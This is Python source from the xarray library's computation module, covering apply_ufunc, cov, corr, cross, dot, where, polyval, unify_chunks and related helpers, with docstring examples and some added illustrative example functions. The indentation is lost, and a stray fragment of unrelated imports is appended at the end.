xarray.map_blocks
:ref:`dask.automatic-parallelization`
User guide describing :py:func:`apply_ufunc` and :py:func:`map_blocks`.
References
----------
.. [1] https://numpy.org/doc/stable/reference/ufuncs.html
.. [2] https://numpy.org/doc/stable/reference/c-api/generalized-ufuncs.html
"""
from .dataarray import DataArray
from .groupby import GroupBy
from .variable import Variable
if input_core_dims is None:
input_core_dims = ((),) * (len(args))
elif len(input_core_dims) != len(args):
raise ValueError(
f"input_core_dims must be None or a tuple with the length same to "
f"the number of arguments. "
f"Given {len(input_core_dims)} input_core_dims: {input_core_dims}, "
f" but number of args is {len(args)}."
)
if kwargs is None:
kwargs = {}
signature = _UFuncSignature(input_core_dims, output_core_dims)
if exclude_dims:
if not isinstance(exclude_dims, set):
raise TypeError(
f"Expected exclude_dims to be a 'set'. Received '{type(exclude_dims).__name__}' instead."
)
if not exclude_dims <= signature.all_core_dims:
raise ValueError(
f"each dimension in `exclude_dims` must also be a "
f"core dimension in the function signature. "
f"Please make {(exclude_dims - signature.all_core_dims)} a core dimension"
)
# handle dask_gufunc_kwargs
if dask == "parallelized":
if dask_gufunc_kwargs is None:
dask_gufunc_kwargs = {}
else:
dask_gufunc_kwargs = dask_gufunc_kwargs.copy()
# todo: remove warnings after deprecation cycle
if meta is not None:
warnings.warn(
"``meta`` should be given in the ``dask_gufunc_kwargs`` parameter."
" It will be removed as direct parameter in a future version.",
FutureWarning,
stacklevel=2,
)
dask_gufunc_kwargs.setdefault("meta", meta)
if output_sizes is not None:
warnings.warn(
"``output_sizes`` should be given in the ``dask_gufunc_kwargs`` "
"parameter. It will be removed as direct parameter in a future "
"version.",
FutureWarning,
stacklevel=2,
)
dask_gufunc_kwargs.setdefault("output_sizes", output_sizes)
if kwargs:
func = functools.partial(func, **kwargs)
if keep_attrs is None:
keep_attrs = _get_keep_attrs(default=False)
if isinstance(keep_attrs, bool):
keep_attrs = "override" if keep_attrs else "drop"
variables_vfunc = functools.partial(
apply_variable_ufunc,
func,
signature=signature,
exclude_dims=exclude_dims,
keep_attrs=keep_attrs,
dask=dask,
vectorize=vectorize,
output_dtypes=output_dtypes,
dask_gufunc_kwargs=dask_gufunc_kwargs,
)
# feed groupby-apply_ufunc through apply_groupby_func
if any(isinstance(a, GroupBy) for a in args):
this_apply = functools.partial(
apply_ufunc,
func,
input_core_dims=input_core_dims,
output_core_dims=output_core_dims,
exclude_dims=exclude_dims,
join=join,
dataset_join=dataset_join,
dataset_fill_value=dataset_fill_value,
keep_attrs=keep_attrs,
dask=dask,
vectorize=vectorize,
output_dtypes=output_dtypes,
dask_gufunc_kwargs=dask_gufunc_kwargs,
)
return apply_groupby_func(this_apply, *args)
# feed datasets apply_variable_ufunc through apply_dataset_vfunc
elif any(is_dict_like(a) for a in args):
return apply_dataset_vfunc(
variables_vfunc,
*args,
signature=signature,
join=join,
exclude_dims=exclude_dims,
dataset_join=dataset_join,
fill_value=dataset_fill_value,
keep_attrs=keep_attrs,
)
# feed DataArray apply_variable_ufunc through apply_dataarray_vfunc
elif any(isinstance(a, DataArray) for a in args):
return apply_dataarray_vfunc(
variables_vfunc,
*args,
signature=signature,
join=join,
exclude_dims=exclude_dims,
keep_attrs=keep_attrs,
)
# feed Variables directly through apply_variable_ufunc
elif any(isinstance(a, Variable) for a in args):
return variables_vfunc(*args)
else:
# feed anything else through apply_array_ufunc
return apply_array_ufunc(func, *args, dask=dask)
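# --- Illustrative example (not part of the original module) ----------------
# A minimal sketch of ``apply_ufunc`` with ``input_core_dims`` and
# ``vectorize=True``. The helper name, dimension names and values below are
# arbitrary assumptions chosen only for the demonstration.
def _example_apply_ufunc_vectorize():
    import numpy as np
    import xarray as xr

    def span(vec):
        # operates on a single 1-d numpy vector (the core dimension)
        return vec.max() - vec.min()

    da = xr.DataArray(np.arange(12).reshape(3, 4), dims=("x", "time"))
    # ``time`` is consumed as the core dimension; vectorize loops over ``x``.
    result = xr.apply_ufunc(
        span, da, input_core_dims=[["time"]], vectorize=True
    )
    assert result.dims == ("x",) and (result == 3).all()
    return result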
def cov(da_a, da_b, dim=None, ddof=1):
"""
Compute covariance between two DataArray objects along a shared dimension.
Parameters
----------
da_a : DataArray
Array to compute.
da_b : DataArray
Array to compute.
dim : str, optional
The dimension along which the covariance will be computed
ddof : int, optional
If ddof=1, covariance is normalized by N-1, giving an unbiased estimate,
else normalization is by N.
Returns
-------
covariance : DataArray
See Also
--------
pandas.Series.cov : corresponding pandas function
xarray.corr : respective function to calculate correlation
Examples
--------
>>> from xarray import DataArray
>>> da_a = DataArray(
... np.array([[1, 2, 3], [0.1, 0.2, 0.3], [3.2, 0.6, 1.8]]),
... dims=("space", "time"),
... coords=[
... ("space", ["IA", "IL", "IN"]),
... ("time", pd.date_range("2000-01-01", freq="1D", periods=3)),
... ],
... )
>>> da_a
<xarray.DataArray (space: 3, time: 3)>
array([[1. , 2. , 3. ],
[0.1, 0.2, 0.3],
[3.2, 0.6, 1.8]])
Coordinates:
* space (space) <U2 'IA' 'IL' 'IN'
* time (time) datetime64[ns] 2000-01-01 2000-01-02 2000-01-03
>>> da_b = DataArray(
... np.array([[0.2, 0.4, 0.6], [15, 10, 5], [3.2, 0.6, 1.8]]),
... dims=("space", "time"),
... coords=[
... ("space", ["IA", "IL", "IN"]),
... ("time", pd.date_range("2000-01-01", freq="1D", periods=3)),
... ],
... )
>>> da_b
<xarray.DataArray (space: 3, time: 3)>
array([[ 0.2, 0.4, 0.6],
[15. , 10. , 5. ],
[ 3.2, 0.6, 1.8]])
Coordinates:
* space (space) <U2 'IA' 'IL' 'IN'
* time (time) datetime64[ns] 2000-01-01 2000-01-02 2000-01-03
>>> xr.cov(da_a, da_b)
<xarray.DataArray ()>
array(-3.53055556)
>>> xr.cov(da_a, da_b, dim="time")
<xarray.DataArray (space: 3)>
array([ 0.2 , -0.5 , 1.69333333])
Coordinates:
* space (space) <U2 'IA' 'IL' 'IN'
"""
from .dataarray import DataArray
if any(not isinstance(arr, DataArray) for arr in [da_a, da_b]):
raise TypeError(
"Only xr.DataArray is supported."
"Given {}.".format([type(arr) for arr in [da_a, da_b]])
)
return _cov_corr(da_a, da_b, dim=dim, ddof=ddof, method="cov")
def corr(da_a, da_b, dim=None):
"""
Compute the Pearson correlation coefficient between
two DataArray objects along a shared dimension.
Parameters
----------
da_a : DataArray
Array to compute.
da_b : DataArray
Array to compute.
dim : str, optional
The dimension along which the correlation will be computed
Returns
-------
correlation: DataArray
See Also
--------
pandas.Series.corr : corresponding pandas function
xarray.cov : underlying covariance function
Examples
--------
>>> from xarray import DataArray
>>> da_a = DataArray(
... np.array([[1, 2, 3], [0.1, 0.2, 0.3], [3.2, 0.6, 1.8]]),
... dims=("space", "time"),
... coords=[
... ("space", ["IA", "IL", "IN"]),
... ("time", pd.date_range("2000-01-01", freq="1D", periods=3)),
... ],
... )
>>> da_a
<xarray.DataArray (space: 3, time: 3)>
array([[1. , 2. , 3. ],
[0.1, 0.2, 0.3],
[3.2, 0.6, 1.8]])
Coordinates:
* space (space) <U2 'IA' 'IL' 'IN'
* time (time) datetime64[ns] 2000-01-01 2000-01-02 2000-01-03
>>> da_b = DataArray(
... np.array([[0.2, 0.4, 0.6], [15, 10, 5], [3.2, 0.6, 1.8]]),
... dims=("space", "time"),
... coords=[
... ("space", ["IA", "IL", "IN"]),
... ("time", pd.date_range("2000-01-01", freq="1D", periods=3)),
... ],
... )
>>> da_b
<xarray.DataArray (space: 3, time: 3)>
array([[ 0.2, 0.4, 0.6],
[15. , 10. , 5. ],
[ 3.2, 0.6, 1.8]])
Coordinates:
* space (space) <U2 'IA' 'IL' 'IN'
* time (time) datetime64[ns] 2000-01-01 2000-01-02 2000-01-03
>>> xr.corr(da_a, da_b)
<xarray.DataArray ()>
array(-0.57087777)
>>> xr.corr(da_a, da_b, dim="time")
<xarray.DataArray (space: 3)>
array([ 1., -1., 1.])
Coordinates:
* space (space) <U2 'IA' 'IL' 'IN'
"""
from .dataarray import DataArray
if any(not isinstance(arr, DataArray) for arr in [da_a, da_b]):
raise TypeError(
"Only xr.DataArray is supported."
"Given {}.".format([type(arr) for arr in [da_a, da_b]])
)
return _cov_corr(da_a, da_b, dim=dim, method="corr")
def _cov_corr(da_a, da_b, dim=None, ddof=0, method=None):
"""
Internal method for xr.cov() and xr.corr() so we only have to
sanitize the input arrays once and don't repeat code.
"""
# 1. Broadcast the two arrays
da_a, da_b = align(da_a, da_b, join="inner", copy=False)
# 2. Ignore the nans
valid_values = da_a.notnull() & da_b.notnull()
da_a = da_a.where(valid_values)
da_b = da_b.where(valid_values)
valid_count = valid_values.sum(dim) - ddof
# 3. Detrend along the given dim
demeaned_da_a = da_a - da_a.mean(dim=dim)
demeaned_da_b = da_b - da_b.mean(dim=dim)
# 4. Compute covariance along the given dim
# N.B. `skipna=False` is required or there is a bug when computing
# auto-covariance. E.g. Try xr.cov(da,da) for
# da = xr.DataArray([[1, 2], [1, np.nan]], dims=["x", "time"])
cov = (demeaned_da_a * demeaned_da_b).sum(dim=dim, skipna=True, min_count=1) / (
valid_count
)
if method == "cov":
return cov
else:
# compute std + corr
da_a_std = da_a.std(dim=dim)
da_b_std = da_b.std(dim=dim)
corr = cov / (da_a_std * da_b_std)
return corr
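# --- Illustrative example (not part of the original module) ----------------
# Relates the public ``cov``/``corr`` wrappers above to plain NumPy for two
# linearly related 1-d arrays. The values are arbitrary assumptions.
def _example_cov_corr_relation():
    import numpy as np
    import xarray as xr

    x = xr.DataArray(np.array([1.0, 2.0, 3.0, 4.0]), dims="time")
    y = 2.0 * x + 1.0
    # With the default ddof=1, xr.cov matches the off-diagonal of np.cov.
    assert np.isclose(xr.cov(x, y).item(), np.cov(x.values, y.values)[0, 1])
    # A perfect linear relationship yields a Pearson correlation of 1.
    assert np.isclose(xr.corr(x, y).item(), 1.0)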
def cross(
a: DataArray | Variable, b: DataArray | Variable, *, dim: Hashable
) -> DataArray | Variable:
"""
Compute the cross product of two (arrays of) vectors.
The cross product of `a` and `b` in :math:`R^3` is a vector
perpendicular to both `a` and `b`. The vectors in `a` and `b` are
defined by the values along the dimension `dim` and can have sizes
1, 2 or 3. Where the size of either `a` or `b` is
1 or 2, the remaining components of the input vector are assumed to
be zero and the cross product is calculated accordingly. In cases where
both input vectors have dimension 2, the z-component of the cross
product is returned.
Parameters
----------
a, b : DataArray or Variable
Components of the first and second vector(s).
dim : hashable
The dimension along which the cross product will be computed.
Must be available in both vectors.
Examples
--------
Vector cross-product with 3 dimensions:
>>> a = xr.DataArray([1, 2, 3])
>>> b = xr.DataArray([4, 5, 6])
>>> xr.cross(a, b, dim="dim_0")
<xarray.DataArray (dim_0: 3)>
array([-3, 6, -3])
Dimensions without coordinates: dim_0
Vector cross-product with 2 dimensions, returns in the perpendicular
direction:
>>> a = xr.DataArray([1, 2])
>>> b = xr.DataArray([4, 5])
>>> xr.cross(a, b, dim="dim_0")
<xarray.DataArray ()>
array(-3)
Vector cross-product with 3 dimensions but zeros at the last axis
yields the same results as with 2 dimensions:
>>> a = xr.DataArray([1, 2, 0])
>>> b = xr.DataArray([4, 5, 0])
>>> xr.cross(a, b, dim="dim_0")
<xarray.DataArray (dim_0: 3)>
array([ 0, 0, -3])
Dimensions without coordinates: dim_0
One vector with dimension 2:
>>> a = xr.DataArray(
... [1, 2],
... dims=["cartesian"],
... coords=dict(cartesian=(["cartesian"], ["x", "y"])),
... )
>>> b = xr.DataArray(
... [4, 5, 6],
... dims=["cartesian"],
... coords=dict(cartesian=(["cartesian"], ["x", "y", "z"])),
... )
>>> xr.cross(a, b, dim="cartesian")
<xarray.DataArray (cartesian: 3)>
array([12, -6, -3])
Coordinates:
* cartesian (cartesian) <U1 'x' 'y' 'z'
One vector with dimension 2 but coords in other positions:
>>> a = xr.DataArray(
... [1, 2],
... dims=["cartesian"],
... coords=dict(cartesian=(["cartesian"], ["x", "z"])),
... )
>>> b = xr.DataArray(
... [4, 5, 6],
... dims=["cartesian"],
... coords=dict(cartesian=(["cartesian"], ["x", "y", "z"])),
... )
>>> xr.cross(a, b, dim="cartesian")
<xarray.DataArray (cartesian: 3)>
array([-10, 2, 5])
Coordinates:
* cartesian (cartesian) <U1 'x' 'y' 'z'
Multiple vector cross-products. Note that the direction of the
cross product vector is defined by the right-hand rule:
>>> a = xr.DataArray(
... [[1, 2, 3], [4, 5, 6]],
... dims=("time", "cartesian"),
... coords=dict(
... time=(["time"], [0, 1]),
... cartesian=(["cartesian"], ["x", "y", "z"]),
... ),
... )
>>> b = xr.DataArray(
... [[4, 5, 6], [1, 2, 3]],
... dims=("time", "cartesian"),
... coords=dict(
... time=(["time"], [0, 1]),
... cartesian=(["cartesian"], ["x", "y", "z"]),
... ),
... )
>>> xr.cross(a, b, dim="cartesian")
<xarray.DataArray (time: 2, cartesian: 3)>
array([[-3, 6, -3],
[ 3, -6, 3]])
Coordinates:
* time (time) int64 0 1
* cartesian (cartesian) <U1 'x' 'y' 'z'
Cross can be called on Datasets by converting to DataArrays and later
back to a Dataset:
>>> ds_a = xr.Dataset(dict(x=("dim_0", [1]), y=("dim_0", [2]), z=("dim_0", [3])))
>>> ds_b = xr.Dataset(dict(x=("dim_0", [4]), y=("dim_0", [5]), z=("dim_0", [6])))
>>> c = xr.cross(
... ds_a.to_array("cartesian"), ds_b.to_array("cartesian"), dim="cartesian"
... )
>>> c.to_dataset(dim="cartesian")
<xarray.Dataset>
Dimensions: (dim_0: 1)
Dimensions without coordinates: dim_0
Data variables:
x (dim_0) int64 -3
y (dim_0) int64 6
z (dim_0) int64 -3
See Also
--------
numpy.cross : Corresponding numpy function
"""
if dim not in a.dims:
raise ValueError(f"Dimension {dim!r} not on a")
elif dim not in b.dims:
raise ValueError(f"Dimension {dim!r} not on b")
if not 1 <= a.sizes[dim] <= 3:
raise ValueError(
f"The size of {dim!r} on a must be 1, 2, or 3 to be "
f"compatible with a cross product but is {a.sizes[dim]}"
)
elif not 1 <= b.sizes[dim] <= 3:
raise ValueError(
f"The size of {dim!r} on b must be 1, 2, or 3 to be "
f"compatible with a cross product but is {b.sizes[dim]}"
)
all_dims = list(dict.fromkeys(a.dims + b.dims))
if a.sizes[dim] != b.sizes[dim]:
# Arrays have different sizes. Append zeros where the smaller
# array is missing a value, zeros will not affect np.cross:
if (
not isinstance(a, Variable) # Only used to make mypy happy.
and dim in getattr(a, "coords", {})
and not isinstance(b, Variable) # Only used to make mypy happy.
and dim in getattr(b, "coords", {})
):
# If the arrays have coords we know which indexes to fill
# with zeros:
a, b = align(
a,
b,
fill_value=0,
join="outer",
exclude=set(all_dims) - {dim},
)
elif min(a.sizes[dim], b.sizes[dim]) == 2:
# If the array doesn't have coords we can only infer
# that it has composite values if the size is at least 2.
# Once padded, rechunk the padded array because apply_ufunc
# requires core dimensions not to be chunked:
if a.sizes[dim] < b.sizes[dim]:
a = a.pad({dim: (0, 1)}, constant_values=0)
# TODO: Should pad or apply_ufunc handle correct chunking?
a = a.chunk({dim: -1}) if is_duck_dask_array(a.data) else a
else:
b = b.pad({dim: (0, 1)}, constant_values=0)
# TODO: Should pad or apply_ufunc handle correct chunking?
b = b.chunk({dim: -1}) if is_duck_dask_array(b.data) else b
else:
raise ValueError(
f"{dim!r} on {'a' if a.sizes[dim] == 1 else 'b'} is incompatible:"
" dimensions without coordinates must have have a length of 2 or 3"
)
c = apply_ufunc(
np.cross,
a,
b,
input_core_dims=[[dim], [dim]],
output_core_dims=[[dim] if a.sizes[dim] == 3 else []],
dask="parallelized",
output_dtypes=[np.result_type(a, b)],
)
c = c.transpose(*all_dims, missing_dims="ignore")
return c
def dot(*arrays, dims=None, **kwargs):
"""Generalized dot product for xarray objects. Like np.einsum, but
provides a simpler interface based on array dimensions.
Parameters
----------
*arrays : DataArray or Variable
Arrays to compute.
dims : ..., str or tuple of str, optional
Which dimensions to sum over. Ellipsis ('...') sums over all dimensions.
If not specified, then all the common dimensions are summed over.
**kwargs : dict
Additional keyword arguments passed to numpy.einsum or
dask.array.einsum
Returns
-------
DataArray
Examples
--------
>>> da_a = xr.DataArray(np.arange(3 * 2).reshape(3, 2), dims=["a", "b"])
>>> da_b = xr.DataArray(np.arange(3 * 2 * 2).reshape(3, 2, 2), dims=["a", "b", "c"])
>>> da_c = xr.DataArray(np.arange(2 * 3).reshape(2, 3), dims=["c", "d"])
>>> da_a
<xarray.DataArray (a: 3, b: 2)>
array([[0, 1],
[2, 3],
[4, 5]])
Dimensions without coordinates: a, b
>>> da_b
<xarray.DataArray (a: 3, b: 2, c: 2)>
array([[[ 0, 1],
[ 2, 3]],
<BLANKLINE>
[[ 4, 5],
[ 6, 7]],
<BLANKLINE>
[[ 8, 9],
[10, 11]]])
Dimensions without coordinates: a, b, c
>>> da_c
<xarray.DataArray (c: 2, d: 3)>
array([[0, 1, 2],
[3, 4, 5]])
Dimensions without coordinates: c, d
>>> xr.dot(da_a, da_b, dims=["a", "b"])
<xarray.DataArray (c: 2)>
array([110, 125])
Dimensions without coordinates: c
>>> xr.dot(da_a, da_b, dims=["a"])
<xarray.DataArray (b: 2, c: 2)>
array([[40, 46],
[70, 79]])
Dimensions without coordinates: b, c
>>> xr.dot(da_a, da_b, da_c, dims=["b", "c"])
<xarray.DataArray (a: 3, d: 3)>
array([[ 9, 14, 19],
[ 93, 150, 207],
[273, 446, 619]])
Dimensions without coordinates: a, d
>>> xr.dot(da_a, da_b)
<xarray.DataArray (c: 2)>
array([110, 125])
Dimensions without coordinates: c
>>> xr.dot(da_a, da_b, dims=...)
<xarray.DataArray ()>
array(235)
"""
from .dataarray import DataArray
from .variable import Variable
if any(not isinstance(arr, (Variable, DataArray)) for arr in arrays):
raise TypeError(
"Only xr.DataArray and xr.Variable are supported."
"Given {}.".format([type(arr) for arr in arrays])
)
if len(arrays) == 0:
raise TypeError("At least one array should be given.")
if isinstance(dims, str):
dims = (dims,)
common_dims = set.intersection(*[set(arr.dims) for arr in arrays])
all_dims = []
for arr in arrays:
all_dims += [d for d in arr.dims if d not in all_dims]
einsum_axes = "abcdefghijklmnopqrstuvwxyz"
dim_map = {d: einsum_axes[i] for i, d in enumerate(all_dims)}
if dims is ...:
dims = all_dims
elif dims is None:
# find dimensions that occur more than once
dim_counts = Counter()
for arr in arrays:
dim_counts.update(arr.dims)
dims = tuple(d for d, c in dim_counts.items() if c > 1)
dims = tuple(dims) # make dims a tuple
# dimensions to be parallelized
broadcast_dims = tuple(d for d in all_dims if d in common_dims and d not in dims)
input_core_dims = [
[d for d in arr.dims if d not in broadcast_dims] for arr in arrays
]
output_core_dims = [tuple(d for d in all_dims if d not in dims + broadcast_dims)]
# construct einsum subscripts, such as '...abc,...ab->...c'
# Note: input_core_dims are always moved to the last position
subscripts_list = [
"..." + "".join(dim_map[d] for d in ds) for ds in input_core_dims
]
subscripts = ",".join(subscripts_list)
subscripts += "->..." + "".join(dim_map[d] for d in output_core_dims[0])
join = OPTIONS["arithmetic_join"]
# using "inner" emulates `(a * b).sum()` for all joins (except "exact")
if join != "exact":
join = "inner"
# subscripts should be passed to np.einsum as arg, not as kwargs. We need
# to construct a partial function for apply_ufunc to work.
func = functools.partial(duck_array_ops.einsum, subscripts, **kwargs)
result = apply_ufunc(
func,
*arrays,
input_core_dims=input_core_dims,
output_core_dims=output_core_dims,
join=join,
dask="allowed",
)
return result.transpose(*all_dims, missing_dims="ignore")
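# --- Illustrative example (not part of the original module) ----------------
# Checks that ``dot`` over a shared dimension agrees with the equivalent
# ``np.einsum`` contraction. Dimension names and values are arbitrary.
def _example_dot_vs_einsum():
    import numpy as np
    import xarray as xr

    a = xr.DataArray(np.arange(6.0).reshape(2, 3), dims=("i", "j"))
    b = xr.DataArray(np.arange(12.0).reshape(3, 4), dims=("j", "k"))
    result = xr.dot(a, b, dims="j")          # contract over the shared dim
    expected = np.einsum("ij,jk->ik", a.values, b.values)
    assert result.dims == ("i", "k")
    assert np.allclose(result.values, expected)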
def where(cond, x, y, keep_attrs=None):
"""Return elements from `x` or `y` depending on `cond`.
Performs xarray-like broadcasting across input arguments.
All dimension coordinates on `x` and `y` must be aligned with each
other and with `cond`.
Parameters
----------
cond : scalar, array, Variable, DataArray or Dataset
When True, return values from `x`, otherwise returns values from `y`.
x : scalar, array, Variable, DataArray or Dataset
values to choose from where `cond` is True
y : scalar, array, Variable, DataArray or Dataset
values to choose from where `cond` is False
keep_attrs : bool or str or callable, optional
How to treat attrs. If True, keep the attrs of `x`.
Returns
-------
Dataset, DataArray, Variable or array
In priority order: Dataset, DataArray, Variable or array, whichever
type appears as an input argument.
Examples
--------
>>> x = xr.DataArray(
... 0.1 * np.arange(10),
... dims=["lat"],
... coords={"lat": np.arange(10)},
... name="sst",
... )
>>> x
<xarray.DataArray 'sst' (lat: 10)>
array([0. , 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9])
Coordinates:
* lat (lat) int64 0 1 2 3 4 5 6 7 8 9
>>> xr.where(x < 0.5, x, x * 100)
<xarray.DataArray 'sst' (lat: 10)>
array([ 0. , 0.1, 0.2, 0.3, 0.4, 50. , 60. , 70. , 80. , 90. ])
Coordinates:
* lat (lat) int64 0 1 2 3 4 5 6 7 8 9
>>> y = xr.DataArray(
... 0.1 * np.arange(9).reshape(3, 3),
... dims=["lat", "lon"],
... coords={"lat": np.arange(3), "lon": 10 + np.arange(3)},
... name="sst",
... )
>>> y
<xarray.DataArray 'sst' (lat: 3, lon: 3)>
array([[0. , 0.1, 0.2],
[0.3, 0.4, 0.5],
[0.6, 0.7, 0.8]])
Coordinates:
* lat (lat) int64 0 1 2
* lon (lon) int64 10 11 12
>>> xr.where(y.lat < 1, y, -1)
<xarray.DataArray (lat: 3, lon: 3)>
array([[ 0. , 0.1, 0.2],
[-1. , -1. , -1. ],
[-1. , -1. , -1. ]])
Coordinates:
* lat (lat) int64 0 1 2
* lon (lon) int64 10 11 12
>>> cond = xr.DataArray([True, False], dims=["x"])
>>> x = xr.DataArray([1, 2], dims=["y"])
>>> xr.where(cond, x, 0)
<xarray.DataArray (x: 2, y: 2)>
array([[1, 2],
[0, 0]])
Dimensions without coordinates: x, y
See Also
--------
numpy.where : corresponding numpy function
Dataset.where, DataArray.where :
equivalent methods
"""
if keep_attrs is None:
keep_attrs = _get_keep_attrs(default=False)
if keep_attrs is True:
# keep the attributes of x, the second parameter, by default to
# be consistent with the `where` method of `DataArray` and `Dataset`
keep_attrs = lambda attrs, context: getattr(x, "attrs", {})
# alignment for three arguments is complicated, so don't support it yet
return apply_ufunc(
duck_array_ops.where,
cond,
x,
y,
join="exact",
dataset_join="exact",
dask="allowed",
keep_attrs=keep_attrs,
)
@overload
def polyval(coord: DataArray, coeffs: DataArray, degree_dim: Hashable) -> DataArray:
...
@overload
def polyval(coord: T_Xarray, coeffs: Dataset, degree_dim: Hashable) -> Dataset:
...
@overload
def polyval(coord: Dataset, coeffs: T_Xarray, degree_dim: Hashable) -> Dataset:
...
def polyval(
coord: T_Xarray, coeffs: T_Xarray, degree_dim: Hashable = "degree"
) -> T_Xarray:
"""Evaluate a polynomial at specific values
Parameters
----------
coord : DataArray or Dataset
Values at which to evaluate the polynomial.
coeffs : DataArray or Dataset
Coefficients of the polynomial.
degree_dim : Hashable, default: "degree"
Name of the polynomial degree dimension in `coeffs`.
Returns
-------
DataArray or Dataset
Evaluated polynomial.
See Also
--------
xarray.DataArray.polyfit
numpy.polynomial.polynomial.polyval
"""
if degree_dim not in coeffs._indexes:
raise ValueError(
f"Dimension `{degree_dim}` should be a coordinate variable with labels."
)
if not np.issubdtype(coeffs[degree_dim].dtype, int):
raise ValueError(
f"Dimension `{degree_dim}` should be of integer dtype. Received {coeffs[degree_dim].dtype} instead."
)
max_deg = coeffs[degree_dim].max().item()
coeffs = coeffs.reindex(
{degree_dim: np.arange(max_deg + 1)}, fill_value=0, copy=False
)
coord = _ensure_numeric(coord)
# using Horner's method
# https://en.wikipedia.org/wiki/Horner%27s_method
res = coeffs.isel({degree_dim: max_deg}, drop=True) + zeros_like(coord)
for deg in range(max_deg - 1, -1, -1):
res *= coord
res += coeffs.isel({degree_dim: deg}, drop=True)
return res
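# --- Illustrative example (not part of the original module) ----------------
# Evaluates 1 + 2*x + 3*x**2 with ``polyval``. The integer ``degree``
# coordinate is required because the implementation reindexes on it; the
# values below are arbitrary assumptions.
def _example_polyval_horner():
    import numpy as np
    import xarray as xr

    x = xr.DataArray([0.0, 1.0, 2.0], dims="x")
    coeffs = xr.DataArray(
        [1.0, 2.0, 3.0], dims="degree", coords={"degree": [0, 1, 2]}
    )
    result = xr.polyval(x, coeffs)
    expected = 1.0 + 2.0 * x + 3.0 * x**2     # [1., 6., 17.]
    assert np.allclose(result.values, expected.values)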
def _ensure_numeric(data: T_Xarray) -> T_Xarray:
"""Converts all datetime64 variables to float64
Parameters
----------
data : DataArray or Dataset
Variables with possible datetime dtypes.
Returns
-------
DataArray or Dataset
Variables with datetime64 dtypes converted to float64.
"""
from .dataset import Dataset
def to_floatable(x: DataArray) -> DataArray:
if x.dtype.kind in "mM":
return x.copy(
data=datetime_to_numeric(
x.data,
offset=np.datetime64("1970-01-01"),
datetime_unit="ns",
),
)
return x
if isinstance(data, Dataset):
return data.map(to_floatable)
else:
return to_floatable(data)
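# --- Illustrative example (not part of the original module) ----------------
# Shows the conversion performed by this module's private ``_ensure_numeric``
# helper: datetime64 values become floating-point nanoseconds since
# 1970-01-01. The dates used are arbitrary assumptions.
def _example_ensure_numeric():
    import numpy as np
    import xarray as xr

    times = xr.DataArray(
        np.array(["1970-01-01", "1970-01-02"], dtype="datetime64[ns]"), dims="t"
    )
    numeric = _ensure_numeric(times)
    assert numeric.dtype.kind == "f"
    assert numeric.values[1] == 86400e9   # one day = 86400e9 nanoseconds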
def _calc_idxminmax(
*,
array,
func: Callable,
dim: Hashable = None,
skipna: bool = None,
fill_value: Any = dtypes.NA,
keep_attrs: bool = None,
):
"""Apply common operations for idxmin and idxmax."""
# This function doesn't make sense for scalars so don't try
if not array.ndim:
raise ValueError("This function does not apply for scalars")
if dim is not None:
pass # Use the dim if available
elif array.ndim == 1:
# it is okay to guess the dim if there is only 1
dim = array.dims[0]
else:
# The dim is not specified and ambiguous. Don't guess.
raise ValueError("Must supply 'dim' argument for multidimensional arrays")
if dim not in array.dims:
raise KeyError(f'Dimension "{dim}" not in dimension')
if dim not in array.coords:
raise KeyError(f'Dimension "{dim}" does not have coordinates')
# These are dtypes with NaN values argmin and argmax can handle
na_dtypes = "cfO"
if skipna or (skipna is None and array.dtype.kind in na_dtypes):
# Need to skip NaN values since argmin and argmax can't handle them
allna = array.isnull().all(dim)
array = array.where(~allna, 0)
# This will run argmin or argmax.
indx = func(array, dim=dim, axis=None, keep_attrs=keep_attrs, skipna=skipna)
# Handle dask arrays.
if is_duck_dask_array(array.data):
import dask.array
chunks = dict(zip(array.dims, array.chunks))
dask_coord = dask.array.from_array(array[dim].data, chunks=chunks[dim])
res = indx.copy(data=dask_coord[indx.data.ravel()].reshape(indx.shape))
# we need to attach back the dim name
res.name = dim
else:
res = array[dim][(indx,)]
# The dim is gone but we need to remove the corresponding coordinate.
del res.coords[dim]
if skipna or (skipna is None and array.dtype.kind in na_dtypes):
# Put the NaN values back in after removing them
res = res.where(~allna, fill_value)
# Copy attributes from argmin/argmax, if any
res.attrs = indx.attrs
return res
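# --- Illustrative example (not part of the original module) ----------------
# ``_calc_idxminmax`` backs ``DataArray.idxmin``/``idxmax``: unlike argmax,
# it returns the coordinate label at which the extreme occurs. Values are
# arbitrary assumptions.
def _example_idxmax_vs_argmax():
    import xarray as xr

    da = xr.DataArray(
        [3.0, 7.0, 5.0], dims="year", coords={"year": [2000, 2001, 2002]}
    )
    assert int(da.argmax("year")) == 1      # positional index of the maximum
    assert int(da.idxmax("year")) == 2001   # coordinate label of the maximum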
def unify_chunks(*objects: T_Xarray) -> tuple[T_Xarray, ...]:
"""
Given any number of Dataset and/or DataArray objects, returns
new objects with unified chunk size along all chunked dimensions.
Returns
-------
unified (DataArray or Dataset) – Tuple of objects with the same type as
*objects with consistent chunk sizes for all dask-array variables
See Also
--------
dask.array.core.unify_chunks
"""
from .dataarray import DataArray
# Convert all objects to datasets
datasets = [
obj._to_temp_dataset() if isinstance(obj, DataArray) else obj.copy()
for obj in objects
]
# Get arguments to pass into dask.array.core.unify_chunks
unify_chunks_args = []
sizes: dict[Hashable, int] = {}
for ds in datasets:
for v in ds._variables.values():
if v.chunks is not None:
# Check that sizes match across different datasets
for dim, size in v.sizes.items():
try:
if sizes[dim] != size:
raise ValueError(
f"Dimension {dim!r} size mismatch: {sizes[dim]} != {size}"
)
except KeyError:
sizes[dim] = size
unify_chunks_args += [v._data, v._dims]
# No dask arrays: Return inputs
if not unify_chunks_args:
return objects
# Run dask.array.core.unify_chunks
from dask.array.core import unify_chunks
_, dask_data = unify_chunks(*unify_chunks_args)
dask_data_iter = iter(dask_data)
out = []
for obj, ds in zip(objects, datasets):
for k, v in ds._variables.items():
if v.chunks is not None:
ds._variables[k] = v.copy(data=next(dask_data_iter))
out.append(obj._from_temp_dataset(ds) if isinstance(obj, DataArray) else ds)
return tuple(out)
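# --- Illustrative example (not part of the original module) ----------------
# Demonstrates ``unify_chunks`` on two dask-backed arrays whose chunk sizes
# differ along a shared dimension (assumes dask is installed).
def _example_unify_chunks():
    import numpy as np
    import xarray as xr

    a = xr.DataArray(np.zeros(12), dims="x").chunk({"x": 4})
    b = xr.DataArray(np.zeros(12), dims="x").chunk({"x": 6})
    a2, b2 = xr.unify_chunks(a, b)
    # Both outputs now share the common chunk boundaries along ``x``.
    assert a2.chunks == b2.chunks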
|
the-stack_0_1577 | import datetime
import json
import logging
import os
import re
import shutil
import cherrypy
import core
